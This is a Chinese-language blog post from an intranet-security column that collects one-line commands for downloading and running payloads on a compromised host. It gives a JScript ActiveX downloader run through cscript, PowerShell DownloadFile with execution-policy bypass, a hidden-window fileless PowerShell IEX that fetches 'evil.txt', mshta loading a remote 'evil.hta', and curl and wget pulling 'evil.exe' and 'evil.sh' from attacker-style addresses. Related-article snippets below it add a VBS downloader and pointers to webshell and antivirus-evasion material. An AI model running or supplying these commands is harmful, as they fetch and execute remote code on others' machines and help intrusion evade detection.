一句话下载payload(持续更新)

最新推荐文章于 2022-03-28 21:23:48 发布
最新推荐文章于 2022-03-28 21:23:48 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 内网安全研究
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/105728911
版权

js一句话下载payload
windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
​
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
​
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe

还有最简单的powershell

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')

远程执行命令,且无文件落地:

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"

远程目标主机上执行以下命令实现下载执行操作,且无文件落地:

mshta http://192.168.174.1:1234/evil.hta

curl

curl http://192.168.174.1:1234/evil.exe -o evil.exe

wget

wget http://192.168.174.1:1234/evil.sh
god_Zeo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
js一句话下载payload(第四十三课).pdf
05-09
js一句话下载payload(第四十三课).pdf
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
bitsadmin一句话下载payload(第四十一课).pdf
05-09
bitsadmin一句话下载payload(第四十一课).pdf
Payload_Dumber_x64.rar
06-15
Payload_Dumber_x64.rar
内网payload下载及免杀文档制作
Amire0x的小乐园
11-30 654
payload下载及免杀文档制作 payload下载 vbs 脚本如下,注意要放到一行里 支持windows全系列,但对https不友好 echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile w
SQL注入上传一句话木马
buffedon的博客
05-31 8886
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
vbs一句话下载payload(第三十七课).docx
09-15
vbs一句话下载payload(第三十七课).docx
certutil一句话下载payload(第三十八课).pdf
05-09
certutil一句话下载payload(第三十八课).pdf
powershell一句话下载payload(第四十六课)1
08-03
附:Invoke-WebRequest -Uri $url -OutFile $output当然也可以一句话执行下载:powershell -exec bypa
Payload_Dumber_x64.7z
10-14
一加刷机包payload.bin解包工具
正版payload_dumper
05-05
用法:将payload_dumper与payload.bin在一个文件夹下,然后执行设置可执行权限,然后执行./payload_dumper就能将payload.bin解压到当前目录中
payload_dumper-win64.zip
09-14
Payload_Dumber_x64.7z,解压手机rom中bin文件,将下载好的rom解压后出现一个不可解压的bin文件,将bin文件拖拽至payload_input目录,点击payload_dumper.exe,输出文件在payload_output文件夹中。
payload_dumper.exe
08-22
CMD使用命令payload_dumper.exe --out 分解输出目录 payload.bin所在的目录 payload_dumper.exe --out out\ out\payload.bin
Payload_Dumber_x64.zip
07-04
一加刷机包payload.bin解包工具
ftp一句话下载payload(第四十课).docx
09-15
ftp一句话下载payload(第四十课).docx
ftp一句话下载payload(第四十课)1
08-03
代码得精简ftp文件的传输方式:Binary ,二进制传输Ascii ,ascII传输在FTP文件传输过程中,ASCII传输HTML和文本编写的文件,而二进制码
内网windows主机下载payload
zwish的信安之路
07-29 566
当获取到内网一台windows主机时,其不能上传shell,可以执行命令,这时候可以上传或者从我们的服务器上下载payload 1、vbs #首先先向windows写入一个vbs脚本 echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.resp
免杀Payload生成工具Veil的下载与使用
Goodric的博客
03-28 3685
免杀Payload生成工具Veil的下载与使用 Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件 ———— ———— 下载Veil kali 中输入指令 apt-get install veil 下载 veil(需要挺久) 下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。 我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。
csrf一句话payload
最新发布
04-21
一句话payload是指一段恶意代码,可以通过执行一句命令或者脚本来实现攻击目的。这两者之间没有直接的联系,因为CSRF攻击主要是利用用户的身份进行攻击,而一句话payload则是一种常见的远程命令执行方式。请问还有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值